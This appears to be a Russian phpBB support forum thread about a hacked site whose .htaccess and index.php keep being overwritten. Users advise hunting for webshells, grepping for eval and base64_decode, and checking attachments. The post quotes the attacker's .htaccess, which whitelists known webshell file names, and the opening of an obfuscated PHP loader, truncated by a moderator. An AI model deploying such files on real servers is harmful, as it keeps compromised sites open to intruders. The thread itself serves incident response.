Уважаемые пользователи!
Напоминаем, что с 7 ноября 2020 года phpBB Group прекратила выпуск обновлений для phpBB версии 3.2.
С учетом этого, рекомендуется обновить конференции до версии 3.3.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.2 до отдельного объявления.

Изменения файлов .htaccess и index.php

Проблемы с установкой или работой phpBB 3.3.x? Получите помощь здесь!
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Мини [FAQ] по phpBB 3.1.x/3.2.x | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
Аватара пользователя
волчара
phpBB 1.4.1
Сообщения: 44
Стаж: 5 лет 10 месяцев
Благодарил (а): 2 раза
Поблагодарили: 7 раз

Изменения файлов .htaccess и index.php

Сообщение волчара »

Приветствую всех :hat
Проблемка образовалась, в чем причина понять не могу.
Дело в том что в последнее время, а сегодня уже второй раз меняется содержание двух файлов .htaccess и index.php, права доступа обоих файлов 644
Содержание меняется на это
Файл .htaccess

Код: Выделить всё

<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php|wp-l0gin.php|wp-theme.php|wp-scripts.php|wp-editor.php)$">
 Order allow,deny
 Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
Файл index.php

Код: Выделить всё

<?php
$OO0__00_OO=urldecode("%6f%41%2d%62%4e%6e%4b%37%4c%35%5f%4a%55%74%52%78%49%59%2b%57%43%61%39%33%56%6b%30%77%4d%31%4f%65%53%44
..........
Помогите разобраться, версия форума 3.3.8
Последний раз редактировалось Siava 23.09.2022 15:41, всего редактировалось 1 раз.
Причина: код усечён, так как антивирусы ругаются
Мудрость заключается не в том, что бы не делать ошибки, а уметь их исправлять вовремя!
Аватара пользователя
Siava
Поддержка
Поддержка
Сообщения: 5037
Стаж: 17 лет 10 месяцев
Откуда: Питер
Благодарил (а): 160 раз
Поблагодарили: 685 раз

Re: Изменения файлов .htaccess и index.php

Сообщение Siava »

волчара, права доступа могут быть и 644, но владелец например тот, от которого работает веб-сервер. Ищите загруженный шелл или бэкдор. Возможно у вас кроме форума есть ещё какие-то скрипты, через которые и взломали.
Еще одно нарушение правил и будете забанены. © Mr. Anderson
Ты очистил кеш? © Sheer
https://siava.ru (phpbb 2.0.x, 3.1.x 3.5.x)
Аватара пользователя
волчара
phpBB 1.4.1
Сообщения: 44
Стаж: 5 лет 10 месяцев
Благодарил (а): 2 раза
Поблагодарили: 7 раз

Re: Изменения файлов .htaccess и index.php

Сообщение волчара »

Siava, :hat
Siava писал(а): 23.09.2022 10:27 Ищите загруженный шелл или бэкдор.
Подскажите как их искать, может есть команды для консоли?

Отправлено спустя 16 минут 1 секунду:
Проверил тремя командами

Код: Выделить всё

find . -type f -name '*.php' | xargs grep -l "eval *(" --color
find . -type f -name '*.php' | xargs grep -l "base64_decode *(" --color
find . -type f -name '*.php' | xargs grep -l "gzinflate *(" --color
ни чего не выдало :?
Мудрость заключается не в том, что бы не делать ошибки, а уметь их исправлять вовремя!
Аватара пользователя
Татьяна5
Поддержка
Поддержка
Сообщения: 11475
Стаж: 11 лет 4 месяца
Благодарил (а): 138 раз
Поблагодарили: 2138 раз

Re: Изменения файлов .htaccess и index.php

Сообщение Татьяна5 »

Тупо скачать всё и пройтись тем же winmerge (на всём, включая расширения). Плюс загрузить во всевозможные антивирусы, иногда ловят лишнее
Аватара пользователя
волчара
phpBB 1.4.1
Сообщения: 44
Стаж: 5 лет 10 месяцев
Благодарил (а): 2 раза
Поблагодарили: 7 раз

Re: Изменения файлов .htaccess и index.php

Сообщение волчара »

Татьяна5, :hat
Скачал весь форум, прошелся тремя антивирусами, все чисто.
Сравнил(прогой winmerge) старый бэкап когда только обновил форум до версии 3.3.8 с сегодняшним и различий не каких.
Мудрость заключается не в том, что бы не делать ошибки, а уметь их исправлять вовремя!
Аватара пользователя
Татьяна5
Поддержка
Поддержка
Сообщения: 11475
Стаж: 11 лет 4 месяца
Благодарил (а): 138 раз
Поблагодарили: 2138 раз

Re: Изменения файлов .htaccess и index.php

Сообщение Татьяна5 »

Тогда либо в БД вирус засел, либо в загружаемых файлах (вложения, аватарки, файлы из расширений)
Аватара пользователя
igorbond
phpBB 3.0.14
Сообщения: 3052
Стаж: 10 лет 11 месяцев
Благодарил (а): 653 раза
Поблагодарили: 135 раз

Re: Изменения файлов .htaccess и index.php

Сообщение igorbond »

Ваш же index.php это файл Вордпресса, причем тут форум? Смотрите как раз в сторону ВП, какие плагины ставили, что делали.
Изображение
Аватара пользователя
волчара
phpBB 1.4.1
Сообщения: 44
Стаж: 5 лет 10 месяцев
Благодарил (а): 2 раза
Поблагодарили: 7 раз

Re: Изменения файлов .htaccess и index.php

Сообщение волчара »

igorbond, :hat
igorbond писал(а): 23.09.2022 15:06 Ваш же index.php это файл Вордпресса, причем тут форум?
Я сперва тоже обратил внимание на это, потом вспомнил что когда то я устанавливал его(хотел посмотреть что за "зверь" такой), но на Поддомен, сегодня утром когда у меня файлы перезаписались, я сразу удалил его(Вордпресс), вернул файлы .htaccess и index.php в рабочее состояние. А вот после обеда опять слетели данные у .htaccess и index.php, пришлось восстанавливать их опять, почистил хеш физически и вроде пока нормально все. После всех манипуляций сообщил и попросил помощи на данном форуме.
Татьяна5 писал(а): 23.09.2022 15:01 Тогда либо в БД вирус засел, либо в загружаемых файлах (вложения, аватарки, файлы из расширений)
Буду разбираться, хотя не давно примерно неделю назад, мне на форум во вложения залили скриншот, она по теме форума была, с час я ее удалю.
Мудрость заключается не в том, что бы не делать ошибки, а уметь их исправлять вовремя!
Аватара пользователя
волчара
phpBB 1.4.1
Сообщения: 44
Стаж: 5 лет 10 месяцев
Благодарил (а): 2 раза
Поблагодарили: 7 раз

Re: Изменения файлов .htaccess и index.php

Сообщение волчара »

волчара писал(а): 23.09.2022 15:40 с час я ее удалю.
Оказывается, там было три скриншота во вложениях, а показывало один :shock:
Мудрость заключается не в том, что бы не делать ошибки, а уметь их исправлять вовремя!

Вернуться в «Поддержка phpBB 3.3.x»